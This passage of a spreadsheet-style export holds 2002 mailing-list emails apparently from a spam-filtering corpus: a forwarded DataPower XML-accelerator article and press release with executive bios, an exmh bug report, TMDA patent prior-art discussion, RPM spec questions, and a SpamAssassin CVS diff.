\nfastest growing company in the U.S. for two consecutive years by Fortune\n\nmagazine. Willis is currently a member of the Institute of Electrical \nand Electronics Engineers (IEEE) and the Internet Research Task Force \n(IRTF) Routing Research Group. Willis has a B.D.I.C. in Computer Science\n\nfrom the University of Massachusetts.\n\nBill Tao, vice president of engineering\n\nWith a vast understanding of network optimization technologies and \nextensive experience in LAN and WAN networking, Bill Tao brings over 25 \nyears of critical knowledge to lead DataPower's engineering efforts. \nPrior to DataPower, Tao was the vice president of engineering for \nSycamore Networks, developing a family of metro/regional optical network\n\nswitches. He is also well acquainted with network optimization \ntechniques as he was previously vice president of engineering at \nInfoLibria, where he led development and software quality assurance \nengineering for a family of network caching products. Tao has held \nsenior engineering positions at NetEdge, Proteon, Codex and Wang. Tao \nreceived a B.S. in Electrical Engineering from the University of \nConnecticut and an M.S. in Computer Science from the University of \nIllinois.\n\nKieran Taylor, director of product marketing\n\nKieran Taylor has an accomplished record as a marketing professional, \nindustry analyst and journalist. Prior to joining DataPower, Taylor was \nthe director of product management and marketing for Akamai Technologies\n\n(NASDAQ: AKAM). As an early contributor at Akamai, he helped develop the\n\ncompany's initial positioning and led the technical development and \ngo-to-market activities for Akamai's flagship EdgeSuite service. \nTaylor's early contribution helped position the service provider to \nsecure a $12.6 billion IPO. He has also held senior marketing management\n\npositions at Nortel Networks, Inc. and Bay Networks. Taylor was \npreviously an analyst at TeleChoice, Inc. and the Wide Area Networks \neditor for Data Communications, a McGraw Hill publication. Taylor holds \na B.A. in Print Journalism from the Pennsylvania State University School\n\nof Communications.\n\n=================================================================\nBoard of Advisors\n\nMark Hoover\nMark Hoover is President and co-founder of Acuitive, Inc., a start-up \naccelerator. With over 20 years experience in the networking industry, \nHoover's expertise spans product development, marketing, and business \ndevelopment. Before launching Acuitive, Hoover worked at AT&amp;T Bell \nLaboratories, AT&amp;T Computer Systems, SynOptics, and Bay Networks, where \nhe played a role in the development of key technologies, such as \n10-BASET, routing, FDDI, ATM, Ethernet switching, firewall, Internet \ntraffic management, and edge WAN switch industries.\n\nGeorge Kassabgi\nCurrently Vice President of Engineering at BEA Systems, Mr. Kassabgi has\n\nheld executive-level positions in engineering, sales and marketing, and \nhas spearheaded leading-edge developments in the application server \nmarketplace since 1996. He is widely known for his regular speaking \nengagements at JavaOne, as well as columns and contributions in JavaPro,\n\nJava Developer's Journal and other publications. In addition to being a \nvenerated Java expert, George Kassabgi holds a patent on SmartObject \nTechnology, and authored the technical book Progress V8.\n\nMarshall T. Rose\nMarshall T. Rose runs his own firm, Dover Beach Consulting, Inc. He \nformerly held the position of the Internet Engineering Task Force (IETF)\n\nArea Director for Network Management, one of a dozen individuals who \noversaw the Internet's standardization process. Rose is the author of \nseveral professional texts on subjects such as Internet Management, \nElectronic Mail, and Directory Services, which have been published in \nfour languages. He is well known for his implementations of core \nInternet technologies (such as POP, SMTP, and SNMP) and OSI technologies\n\n(such as X.500 and FTAM). Rose received a PhD in Information and \nComputer Science from the University of California, Irvine, in 1984.</t>
  </si>
  <si>
    <t>To: Chris Garrigues &lt;cwg-dated-1030804078.e8b0d5@DeepEddy.Com&gt;\nFrom: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nDate: Tue, 27 Aug 2002 15:58:58 +0700</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 15:58:58 +0700</t>
  </si>
  <si>
    <t>Chris Garrigues &lt;cwg-dated-1030804078.e8b0d5@DeepEddy.Com&gt;</t>
  </si>
  <si>
    <t>Date:        Mon, 26 Aug 2002 09:27:56 -0500     From:        Chris Garrigues      Message-ID:  &lt;1030372078.11075.TMDA@deepeddy.vircio.com&gt;   | Tell me what keystroke made it happen so I can reproduce it and I'll   | see what I can do about it (or if I can't, I'll hand it off to Brent). Don't worry too much about it, you seem to have plenty of other things to do in the immediate future, and this one isn't so critical that people can't use the code in normal ways. But, to make it happen, type (with normal key bindings) any digit, so the code thinks you're trying a message number, then backspace, so the digit goes away, then '-' (other junk characters don't seem to have the problem, I have just been playing).   That will do it (every time). That is: 0 ^h - Once you get into that state, the same traceback occurs for every character you type, until a message is selected with the mouse. This is looking like it might be easy to find and fix, so I'll take a look at it later. kre _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: 0xdeadbeef@petting-zoo.net\nFrom: gkm@petting-zoo.net (glen mccready)\nDate: Tue, 27 Aug 2002 15:21:02 -0700</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 15:21:02 -0700</t>
  </si>
  <si>
    <t>The "other" kind of work-experience ...</t>
  </si>
  <si>
    <t>Forwarded-by: Per Hammer  [URL]http://news.bbc.co.uk[/URL] Brothel duty for Australian MP A conservative Member of Parliament in Australia is set to  spend the day as a "slave" at one of Western Australia's most  notorious brothels.  Liberal Party member Barry Haase was "won" in a charity auction  after the madam of Langtree's brothel in the mining town of  Kalgoorlie made the highest offer for his services for a day.  [...] "I hope he will leave with an informed decision on what  Australian brothels are all about and it will help him in his  political career to make informed decisions that he might not  have been able to make before," Ms Kenworthy said.  Mr Haase, a member of Prime Minister John Howard's party  seemed relaxed about the prospect of working in a brothel.  "You can't be half-hearted about fundraising for significant  charities and I think I'm big enough to play the game," he said.</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Rohit Khare &lt;khare@alumni.caltech.edu&gt;\nDate: Tue, 27 Aug 2002 15:00:13 -0700</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 15:00:13 -0700</t>
  </si>
  <si>
    <t>DataPower announces XML-in-silicon</t>
  </si>
  <si>
    <t>No analysis yet... don't know what to make of it yet. But here's the raw \nbits for all to peruse and check out what's really going on... Best, \nRohit\n\n===========================================================\n\nDataPower delivers XML acceleration device\nByScott Tyler Shafer\nAugust 27, 2002 5:46 am PT\n\nDATAPOWER TECHNOLOGY ON Monday unveiled its network device designed \nspecifically to process XML data. Unlike competing solutions that \nprocess XML data in software, DataPower's device processes the data in \nhardware -- a technology achievement that provides greater performance, \naccording to company officials.\n\nThe new device, dubbed DataPower XA35 XML Accelerator, is the first in a \nfamily of products expected from the Cambridge, Mass.-based startup. The \nDataPower family is based on a proprietary processing core technology \ncalled XG3 that does the analysis, parsing, and processing of the XML \ndata.\n\nAccording to Steve Kelly, CEO of DataPower, the XA35 Accelerator was \nconceived to meet the steady adoption of XML, the anticipated future \nproliferation of Web services, and as a means to share data between two \nbusinesses.\n\n"Our vision is to build out an XML-aware infrastructure," Kelly said. \n"The XA35 is the first of a family."\n\nKelly explained that converting data into XML increases the file size up \nto 20 times. This, he said, makes processing the data very taxing on \napplication servers; DataPower believes an inline device is the best \nalternative.\n\nIn addition to the large file sizes, security is also of paramount \nimportance in the world of XML.\n\n"Today's firewalls are designed to inspect HTTP traffic only," Kelly \nsaid. "A SOAP packet with XML will go straight through a firewall. \nFirewalls are blind to XML today."\n\nFuture products in DataPowers family will focus more specifically on \nsecurity, especially as Web services proliferate, Kelly said.\n\nAccording to DataPower, most existing solutions to offload XML \nprocessing are homegrown and done in software -- an approach the company \nitself tried initially and found to be inadequate with regards to speed \nand security. After trying the software path, the company turned to \ncreating a solution that would process XML in hardware.\n\n"Our XG3 execution core converts XML to machine code," said Kelly, \nadding that to his knowledge no other company's solution does. Kelly \nsaid in the next few months he expects the market to be flooded with \ntechnologies that claim to do XML processing -- claims that he believes \nwill be mostly false.\nOther content-aware switches, such as SSL (secure socket layer) \naccelerators and load balancers, look at the first 64 bytes of a packet, \nwhile the XA35 provides deeper packet inspection, looking at 1,400 bytes \nand thus enabling greater processing of XML data, Kelly explained.\n\nThe 1U-high network device has been tested against a large collection of \nXML and XSL data types and can learn new flavors of the markup language \nas they pass through the device.\n\nThe XA35 can be deployed in proxy mode behind a firewall and a load \nbalancer, and it will inspect all traffic that passes and will identify \nand process those packets that are XML, Kelly said.\n\nIn addition to proxy mode, the device can also be used as an application \nco-processor. This deployment method gives administrators more granular \ncontrol over what data is inspected and the application server itself \ncontrols the device.\n\nDataPower is not the only company chasing this emerging market. Startup \nSarvega, based in Burr Ridge, Ill., introduced the Sarvega XPE switch in \nMay, and earlier this month Tarari, an Intel spin-off, launched with a \nfocus on content processing and acceleration.\nThe DataPower device is now available, priced starting at $54,995. The \ncompany has announced one customer to date and says the product is in \nfield trails at a number of other enterprises.\n\n=========================================================================\n\nDataPower has been addressing enterprise networking needs since it was \nfounded in early 1999 by Eugene Kuznetsov, a technology visionary who \nforesaw the adverse effects XML and other next generation protocols \nwould have on enterprise networks. Long before industry interest in XML \ngrew, Kuznetsov assembled a team of world-class M.I.T. engineers and \ndesigned the industry's first solutions to address the unique \nrequirements for processing XML. The first such solution was a software \ninterpreter called DGXT. This software-based approach to XML processing \nis still licensed by many companies for use in their own products today.\n\nLeveraging the detailed knowledge and customer experience gained from \ndeveloping software-based accelerators, Kuznetsov's team raised the bar \nand designed a system for processing XML in purpose-built hardware. In \n2001, DataPower's effort produced XML Generation Three (XG3), the \nindustry's fastest technology for XML processing, bar none.\n\nToday, XG3 technology powers the industry's first wire-speed XML \nnetwork devices, enabling secure, high-speed applications and XML Web \nServices. While other companies are just now marketing first versions of \nproducts, DataPower is delivering its third generation of technology, \nproviding an immediate return on technology investments to \nindustry-leading customers and partners.\n\nDataPower's M.I.T. heritage is complemented by a management team that \nbrings decades of experience in the networking and computing industries, \ndrawing veteran leaders from several successful companies including \nAkamai, Argon, Cascade, Castle Networks, Sycamore and Wellfleet.\n\n=========================================================================\n\nDataPower Technology Secures $9.5 Million in Funding\n\nVenrock Associates, Mobius Venture Capital and Seed Capital Back Pioneer \nin XML-Aware Networking for Web Services\n\nCAMBRIDGE, Mass. - July 8, 2002 - DataPower Technology, Inc., the \nleading provider of XML-Aware network infrastructure, today announced \nthat it has secured $9.5 million in series B financing. Investors for \nthis round include Venrock Associates, Mobius Venture Capital and Seed \nCapital Partners. Michael Tyrrell, of Venrock, Bill Burnham, of Mobius, \nand Jeff Fagnan, of Seed Capital, have joined DataPowers Board of \nDirectors.\n\nDataPower will use this funding to accelerate development, marketing and \nsales of the companys breakthrough technology for XML-Aware networking. \nFounded in 1999, DataPower invented the worlds first intelligent XML \nnetworkingdevices, capable of transforming XML traffic and transactions \nat the wire-speed enterprises need to effectively embrace Web services \nand other XML-centric initiatives. DataPowers solutions are based on \nits patent-pending XML Generation Three (XG3) technology.\n\n"Enterprises are adopting XML at rapid rate to facilitate inter-and \nintra-company communications but their network infrastructure is ill \nprepared to support the requirements of this new traffic type. \nDataPowers XML-acceleration devices enable the wirespeed processing of \nXML that is required to support next generation enterprise \napplications," said Eugene Kuznetsov, CTO and founder of DataPower \nTechnology.\n\n"DataPower gives companies the ability to use XML thats critical to Web \nservices projects without sacrificing an ounce of performance." A single \nDataPower acceleration engine delivers the processing power of 10 \nserversbreaking the performance bottleneck associated with XML \nprocessing and delivering an extraordinary return on investment. In \naddition, the DataPower platform provides enhanced XML security, \nprotection against XML-based denial-of-service attacks, connection of \ne-business protocols for incompatible XML data streams, load balancing \nbetween back-end servers and real-time statistics reports.\n\n"In the post-bubble economy, technology investment decisions require \nlaser-focused scrutiny. DataPowers patent-pending technology addresses \na very real and growing pain point for enterprises," said Michael \nTyrrell of Venrock Associates. "By turbo-charging their networks with \nDataPowers unique XML-Aware networking technology, companies will be \nfree to adopt next generation Web services without encountering \nperformance and security pitfalls."\n\n"We looked long and hard for a company capable of addressing the rapidly \ngrowing problems surrounding XML message processing performance and \nsecurity," said Bill Burnham of Mobius Venture Capital. "DataPower is on \ntheir third generation of technology. Their patent pending XML \nGeneration Three (XG3)technology was quite simply the single most \ncompelling technology solution we have seen to date."\n\n"XML is not a nice-to-have, it is a must have for enterprises serious \nabout optimizing application efficiency. Since 1999, DataPower has been \ndeveloping solutions to facilitate enterprise use of XML and Web \nservices," said Jeff Fagnan of Seed Capital Partners. "DataPowers \nXML-acceleration devices are a key requirement for enterprises that rely \non XML for mission critical applications."\n\nAbout Venrock Associates\nVenrock Associates was founded as the venture capital arm of the \nRockefeller Family and continues a tradition of funding entrepreneurs \nthat now spans over seven decades. Laurance S. Rockefeller pioneered \nearly stage venture financing in the 1930s. With over 300 investments \nover a span of more than 70 years, the firm has an established a track \nrecord of identifying and supporting promising early stage, technology- \nbased enterprises. As one of most experienced venture firms in the \nUnited States, Venrock maintains a tradition of collaboration with \ntalented entrepreneurs to establish successful, enduring companies. \nVenrock's continuing goal is to create long-term value by assisting \nentrepreneurs in building companies from the formative stages. Their \nconsistent focus on Information Technology and Life Sciences-related \nopportunities provides a reservoir of knowledge and a network of \ncontacts that have proven to be a catalyst for the growth of developing \norganizations. Venrock's investments have included CheckPoint Software, \nUSinternetworking, Caliper Technologies, Illumina, Niku, DoubleClick, \nMedia Metrix, 3COM, Intel, and Apple Computer. With offices in New York \nCity, Cambridge, MA, and Menlo Park, CA, Venrock is well positioned to \nrespond to opportunities in any locale. For more information on Venrock \nAssociates, please visit [URL]www.venrock.com[/URL]\n\nAbout Mobius Venture Capital\nMobius Venture Capital, formerly SOFTBANK Venture Capital, is a $2.5 \nbillion U.S.-based private equity venture capital firm managed by an \nunparalleled team of former CEOs and entrepreneurs, technology pioneers, \nsenior executives from major technology corporations, and leaders from \nthe investment banking community. Mobius Venture Capital specializes \nprimarily in early-stage investments in the areas of: communications \nsystems software and services; infrastructure software and services; \nprofessional services; enterprise applications; healthcare informatics; \nconsumer and small business applications; components; and emerging \ntechnologies. Mobius Venture Capital combines its technology expertise \nand broad financial assets with the industry's best entrepreneurs to \ncreate a powerhouse portfolio of over 100 of the world's leading high \ntechnology companies. Mobius Venture Capital can be contacted by \nvisiting their web site [URL]www.mobiusvc.com[/URL]\n\nAbout Seed Capital Partners\nSeed Capital Partners is an early-stage venture fund affiliated with \nSoftBank Corporation, one of the world's leading Internet market forces. \nSeed Capital manages funds focused primarily on companies addressing \nInternet-enabled business-to-business digital information technology \nopportunities, which are located in the Northeastern U.S., the \nsoutheastern region of the Province of Ontario, Canada, and Israel. Seed \nCapitals portfolio includes Spearhead Technologies, Concentric Visions \nand CompanyDNA. For more information on Seed Capital Partners, please \nvisit [URL]www.seedcp.com[/URL]\n\nAbout DataPower Technology\nDataPower Technology provides enterprises with intelligent XML-Aware \nnetwork infrastructure to ensure unparalleled performance, security and \nmanageability of next-generation protocols. DataPowers patent-pending \nXML Generation Three (XG3) technology powers the industrys first \nwirespeed XML network devices, enabling secure, high-speed applications \nand XML Web Services. Founded in 1999, DataPower is now delivering its \nthird generation of technology, providing immediate return on technology \ninvestments to industry-leading customers and partners. DataPower is \nprivately held and based in Cambridge, MA. Investors include Mobius \nVenture Capital, Seed Capital Partners, and Venrock Associates.\n\nCONTACT:\n\nDataPower Technology, Inc.\nKieran Taylor\n617-864-0455\nkieran@datapower.com\n\nSchwartz Communications\nJohn Moran/Heather Chichakly\n781-684-0770\ndatapower@schwartz-pr.com\n\n========================================================================\n\nSteve Kelly, chairman and CEO\n\nDuring over twenty years in the technology industry, Steve Kelly has \nbuilt and managed global enterprise networks, provided consulting \nservices to Fortune 50 businesses, and been involved in the launch of \nseveral start-ups. Prior to DataPower, Kelly was an \nentrepreneur-in-residence at Venrock Associates, and was co-founder of \nCastle Networks, where he led the company's sales, service and marketing \nfunctions. Castle was acquired by Siemens AG in 1999 to create Unisphere \nNetworks, which was subsequently purchased by Juniper Networks. Kelly \nwas an early contributor at Cascade Communications, where he built and \nmanaged the company's core switching business; Cascade's annual revenues \ngrew from $2 million to $300 million annually during Kelly's tenure. \nKelly also worked at Digital Equipment Corporation where he managed and \ngrew their corporate network to 50,000+ nodes in 28 countries, the \nlargest in the world at the time. Kelly has a B.S. in Information \nSystems from Bentley College.\n\nEugene Kuznetsov, founder, president and CTO\n\nEugene Kuznetsov is a technology visionary that has been working to \naddress enterprise XML issues since the late 90s. Kuznetsov founded \nDataPower Technology, Inc. in 1999 to provide enterprises with an \nintelligent, XML-aware network infrastructure to support next-generation \napplications. Prior to starting DataPower, Kuznetsov led the Java JIT \nCompiler effort for Microsoft Internet Explorer for Macintosh 4.0. He \nwas also part of the team which developed one of the first clean room \nJava VM's. This high-speed runtime technology was licensed by some of \nthe industry's largest technology companies, including Apple Computer. \nHe has consulted to numerous companies and worked on a variety of \nhardware and software engineering problems in the areas of memory \nmanagement, power electronics, optimized execution engines and \napplication integration. Kuznetsov holds a B.S. in electrical \nengineering from MIT.\n\nSteve Willis, vice president of advanced technology\n\nSteve Willis is an accomplished entrepreneur and a pioneer in protocol \noptimization. Prior to joining DataPower, Willis was co-founder and CTO \nof Argon Networks, a provider of high-performance switching routers that \nwas acquired by Siemens AG in 1999 to create Unisphere Networks; \nUnisphere was subsequently purchased by Juniper Networks. Before Argon, \nSteve was vice president of advanced technology at Bay Networks (now \nNortel Networks) where he led both IP and ATM-related technology \ndevelopment and managed a group that generated 24 patent applications, \ndeveloped a 1 Mbps forwarding engine and led the specification of the \nATM Forum's PNNI routing protocol. Most notably, Steve was co-founder, \noriginal software director and architect for Wellfleet Communications, a \nleading pioneer of multi-protocol routers. Wellfleet was rated as the \nfastest growing company in the U.S. for two consecutive years by Fortune \nmagazine. Willis is currently a member of the Institute of Electrical \nand Electronics Engineers (IEEE) and the Internet Research Task Force \n(IRTF) Routing Research Group. Willis has a B.D.I.C. in Computer Science \nfrom the University of Massachusetts.\n\nBill Tao, vice president of engineering\n\nWith a vast understanding of network optimization technologies and \nextensive experience in LAN and WAN networking, Bill Tao brings over 25 \nyears of critical knowledge to lead DataPower's engineering efforts. \nPrior to DataPower, Tao was the vice president of engineering for \nSycamore Networks, developing a family of metro/regional optical network \nswitches. He is also well acquainted with network optimization \ntechniques as he was previously vice president of engineering at \nInfoLibria, where he led development and software quality assurance \nengineering for a family of network caching products. Tao has held \nsenior engineering positions at NetEdge, Proteon, Codex and Wang. Tao \nreceived a B.S. in Electrical Engineering from the University of \nConnecticut and an M.S. in Computer Science from the University of \nIllinois.\n\nKieran Taylor, director of product marketing\n\nKieran Taylor has an accomplished record as a marketing professional, \nindustry analyst and journalist. Prior to joining DataPower, Taylor was \nthe director of product management and marketing for Akamai Technologies \n(NASDAQ: AKAM). As an early contributor at Akamai, he helped develop the \ncompany's initial positioning and led the technical development and \ngo-to-market activities for Akamai's flagship EdgeSuite service. \nTaylor's early contribution helped position the service provider to \nsecure a $12.6 billion IPO. He has also held senior marketing management \npositions at Nortel Networks, Inc. and Bay Networks. Taylor was \npreviously an analyst at TeleChoice, Inc. and the Wide Area Networks \neditor for Data Communications, a McGraw Hill publication. Taylor holds \na B.A. in Print Journalism from the Pennsylvania State University School \nof Communications.\n\n=================================================================\nBoard of Advisors\n\nMark Hoover\nMark Hoover is President and co-founder of Acuitive, Inc., a start-up \naccelerator. With over 20 years experience in the networking industry, \nHoover's expertise spans product development, marketing, and business \ndevelopment. Before launching Acuitive, Hoover worked at AT&amp;T Bell \nLaboratories, AT&amp;T Computer Systems, SynOptics, and Bay Networks, where \nhe played a role in the development of key technologies, such as \n10-BASET, routing, FDDI, ATM, Ethernet switching, firewall, Internet \ntraffic management, and edge WAN switch industries.\n\nGeorge Kassabgi\nCurrently Vice President of Engineering at BEA Systems, Mr. Kassabgi has \nheld executive-level positions in engineering, sales and marketing, and \nhas spearheaded leading-edge developments in the application server \nmarketplace since 1996. He is widely known for his regular speaking \nengagements at JavaOne, as well as columns and contributions in JavaPro, \nJava Developer's Journal and other publications. In addition to being a \nvenerated Java expert, George Kassabgi holds a patent on SmartObject \nTechnology, and authored the technical book Progress V8.\n\nMarshall T. Rose\nMarshall T. Rose runs his own firm, Dover Beach Consulting, Inc. He \nformerly held the position of the Internet Engineering Task Force (IETF) \nArea Director for Network Management, one of a dozen individuals who \noversaw the Internet's standardization process. Rose is the author of \nseveral professional texts on subjects such as Internet Management, \nElectronic Mail, and Directory Services, which have been published in \nfour languages. He is well known for his implementations of core \nInternet technologies (such as POP, SMTP, and SNMP) and OSI technologies \n(such as X.500 and FTAM). Rose received a PhD in Information and \nComputer Science from the University of California, Irvine, in 1984.</t>
  </si>
  <si>
    <t>To: &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Bill Jacobs" &lt;billjac@earthlink.net&gt;\nDate: Tue, 27 Aug 2002 14:42:46 -0400</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 14:42:46 -0400</t>
  </si>
  <si>
    <t>"Bill Jacobs" &lt;billjac@earthlink.net&gt;</t>
  </si>
  <si>
    <t>Re: [zzzzteana] Moon over ocean</t>
  </si>
  <si>
    <t>David asked:\n&gt; My wife noticed something odd.  The nearly-full moon was about 30\n&gt; degrees above the horizon.  There was a notable glow on the horizon,\n&gt; except under the moon.  The moon seemed to be in a column of darkness\n&gt; that was about three times the apparent width of the moon.  We could see\n&gt; the column over its entire length as a strip of sky darker than the sky\n&gt; around it.\n&gt;\n&gt; Any of you ever see this?  Do you have any idea what could have caused\n&gt; it?  I suspect it's due to some pecularity of the visual system, but\n&gt; have no clear idea.\n\nI'm surprised to not find this phenomenon in Corlis. I could have sworn I\nsaw it there. He does have the somewhat similar dark sky between a rainbow\nand a secondary bow. I personally have seen a rainbow enclosing a\nsemi-circle of darker sky.\n\nI know I've read about pillars under the Sun and Moon elsewhere, but I can't\nrecall if they were reportedly dark or bright. I do know these sorts of\nthings are supposed to be quirks of optics not of the visual system. I'm\nsorry I haven't got any answers, but a search through some books on\natmospheric optics ought to turn a few hints up.\n\nBill\n\nWilliam Jacobs\nFreelance Unemployed Person\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Inn Share &lt;shareinnn@yahoo.com&gt;\nDate: Tue, 27 Aug 2002 12:31:52 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 12:31:52 -0700 (PDT)</t>
  </si>
  <si>
    <t>[ILUG] find the biggest file</t>
  </si>
  <si>
    <t>Hi,all:\n\nDoes anyone know how to list the biggest file in my\nroot directory?or the second biggest ..etc...\n\nBecause I want to find out what is the reason cause my\nroot all most full.\n\nThe system is Solaris 8 Sparc.\n\nThanks !!!\n\n__________________________________________________\nDo You Yahoo!?\nYahoo! Finance - Get real-time stock quotes\n[URL]http://finance.yahoo.com[/URL]\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://finance.yahoo.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: "Justin Mason" &lt;yyyy@spamassassin.taint.org&gt;,\nFrom: "Brian May" &lt;brian@unearthed.com&gt;\nDate: Tue, 27 Aug 2002 11:55:58 -0700</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 11:55:58 -0700</t>
  </si>
  <si>
    <t>"Brian May" &lt;brian@unearthed.com&gt;</t>
  </si>
  <si>
    <t>"Justin Mason" &lt;yyyy@spamassassin.taint.org&gt;,</t>
  </si>
  <si>
    <t>&gt;&gt;From tmda.net/history.html: The first release of TMDA in April 2001 was essentially a rewrite of TMS in Python,  April 2001 is earlier than July 26, 2001... prior art.. from [URL]http://tmda.net[/URL]  Parent Directory        19-Aug-2002 16:14      -  README.MD5SUM           19-Aug-2002 16:14     4k  tmda-0.01.tgz           22-Apr-2001 15:59    11k  tmda-0.02.tgz           26-Apr-2001 12:06    12k  tmda-0.02.txt           26-Apr-2001 12:50     1k  tmda-0.10.tgz           27-Apr-2001 21:14    39k  tmda-0.10.txt           30-Apr-2001 11:36     3k  tmda-0.11.tgz           02-May-2001 17:17    38k  tmda-0.11.txt           02-May-2001 17:06     3k  tmda-0.12.tgz           10-May-2001 19:50    39k  tmda-0.12.txt           10-May-2001 19:48     1k  tmda-0.13.tgz           17-May-2001 15:53    39k  tmda-0.13.txt           17-May-2001 15:57     2k  tmda-0.14.tgz           24-May-2001 16:43    46k  tmda-0.14.txt           24-May-2001 16:40     4k  tmda-0.15.tgz           28-May-2001 15:20    47k  tmda-0.15.txt           28-May-2001 15:20     1k  tmda-0.20.tgz           06-Jun-2001 17:52    49k  tmda-0.20.txt           06-Jun-2001 18:46     6k  tmda-0.21.tgz           18-Jun-2001 18:32    51k  tmda-0.21.txt           18-Jun-2001 18:31     2k TMDA was already at 0.21 8 days before filing for a patent.. ----- Original Message ----- From: "Jason R. Mastaler"  To: "Justin Mason"  Cc: ;  Sent: Tuesday, August 27, 2002 11:34 AM Subject: [SAtalk] Re: patent on TMDA-like system jm@jmason.org (Justin Mason) writes: &gt; Sounds a lot like TMDA to me. :( Filing date is July 26, 2001, &gt; granted May 16, 2002. &gt; &gt; TMDAers, have you seen this before? No, but thanks for pointing it out. &gt; I'd presume TMDA is prior art, but still, it could be troublesome... Yup.  TMDA's core functionality was fully established before even the filing date. Anyone with experience in this area have a recommendation on whether this should be pursued or not? ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://tmda.net https://www.inphonic.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Torsten Bronger &lt;bronger@users.sourceforge.net&gt;\nDate: Tue, 27 Aug 2002 11:31:53 +0200</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 11:31:53 +0200</t>
  </si>
  <si>
    <t>Torsten Bronger &lt;bronger@users.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>Re: "requires:" and relational operators</t>
  </si>
  <si>
    <t>Halloechen! On Dienstag, 27. August 2002 05:41 schrieben Sie: &gt; [Question about require tag] Oops, sorry.  Now I found out that there is a noewsgroup ... :-) Tschoe, Torsten. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: Brian McNett &lt;bmcnett@radparker.com&gt;\nDate: Tue, 27 Aug 2002 09:32:31 -0700</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 09:32:31 -0700</t>
  </si>
  <si>
    <t>Re: [SAtalk] where can I find the Habeas patent (application)?</t>
  </si>
  <si>
    <t>On Tuesday, August 27, 2002, at 06:03  AM, Tony L. Svanstrom wrote:\n\n&gt; Where can I find it, I was searching online without any luck... =(\n\nYou can't, because there isn't one, yet.  Habeas is using a \ncombination of copyright and trademark law to protect their \nsender warranties.  They hope to patent the system, but they \nhave not been ISSUED a patent.\n\n--B\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RPM Mailing List" &lt;rpm-zzzlist@freshrpms.net&gt;\nFrom: Torsten Bronger &lt;bronger@users.sourceforge.net&gt;\nDate: Tue, 27 Aug 2002 05:41:16 +0200</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 05:41:16 +0200</t>
  </si>
  <si>
    <t>"RPM Mailing List" &lt;rpm-zzzlist@freshrpms.net&gt;</t>
  </si>
  <si>
    <t>"requires:" and relational operators</t>
  </si>
  <si>
    <t>Halloechen! I have Requires: saxon &gt;= 6.5.1 Conflicts: saxon &gt;= 7 in my spec file.  But apparently rpm ignores all version numbers. So, Requires: saxon &gt;= 6.5.1 # Conflicts: saxon &gt;= 7 would install even with saxon-3.0.0, and # Requires: saxon &gt;= 6.5.1 Conflicts: saxon &gt;= 7 wouldn't install even with saxon-6.5.2.  What could be the reason for this? Tschoe, Torsten. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-commits@example.sourceforge.net\nFrom: "Malte S. Stretz" &lt;msquadrat@users.sourceforge.net&gt;\nDate: Tue, 27 Aug 2002 02:31:31 -0700</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 02:31:31 -0700</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin/debian spamassassin.README.Debian,1.1,1.2</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin/debian\nIn directory usw-pr-cvs1:/tmp/cvs-serv23243/debian\n\nModified Files:\n	spamassassin.README.Debian \nLog Message:\nremoved -P\n\nIndex: spamassassin.README.Debian\n===================================================================\nRCS file: /cvsroot/spamassassin/spamassassin/debian/spamassassin.README.Debian,v\nretrieving revision 1.1\nretrieving revision 1.2\ndiff -b -w -u -d -r1.1 -r1.2\n--- spamassassin.README.Debian	21 Jun 2002 02:46:50 -0000	1.1\n+++ spamassassin.README.Debian	27 Aug 2002 09:31:29 -0000	1.2\n@@ -2,7 +2,7 @@\n you wish to use spamd (the Daemon version of spamassassin), please edit\n /etc/default/spamassassin.\n \n-'spamc' is equivalent to 'spamassassin -P' and you should use it instead if\n+'spamc' is equivalent to 'spamassassin' and you should use it instead if\n (and only if) you enabled 'spamd' (and you've installed the spamc package)\n \n To add rules, change scores, edit the template, edit\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nSpamassassin-commits mailing list\nSpamassassin-commits@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
